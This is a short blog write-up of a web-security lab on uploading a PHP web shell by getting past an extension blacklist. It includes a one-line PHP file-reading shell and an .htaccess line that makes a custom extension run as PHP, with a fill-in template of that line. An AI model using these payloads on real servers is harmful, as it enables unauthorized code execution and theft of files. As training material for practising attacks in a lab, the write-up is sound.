Web Shell Upload Via Extension Blacklist Bypass


# Description

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter.

# Solution

# Finding the Vulnerability

We navigate to the login page and sign in with the given credentials: wiener:peter.

Test File Upload

We use Vim to create an exploit.php web shell and then attempt to upload it to the server.

Payload

1
vim exploit.php
1
<?php echo file_get_contents('/home/carlos/secret'); ?>

The response in Burp Suite indicates that the server is Apache. Furthermore, the error message on the web app is quite descriptive, stating: “Sorry, php files are not allowed. Sorry, there was an error uploading your file.”

# Exploitation

Overriding the server configuration

Since the server is Apache, we uploaded a .htaccess file to create a whitelisted extension, .test1234. Then, we renamed our exploit.php file to exploit.test1234 and uploaded the file to read /home/carlos/secret.

My .htaccess payload

1
vim .htaccess
1
AddType application/x-httpd-php .test1234

Your .htaccess payload

1
AddType application/x-httpd-php .[Your Extension Name]

Enter Secret

We finished the lab by submitting the secret as the solution.

Built with Hugo
Theme Stack designed by Jimmy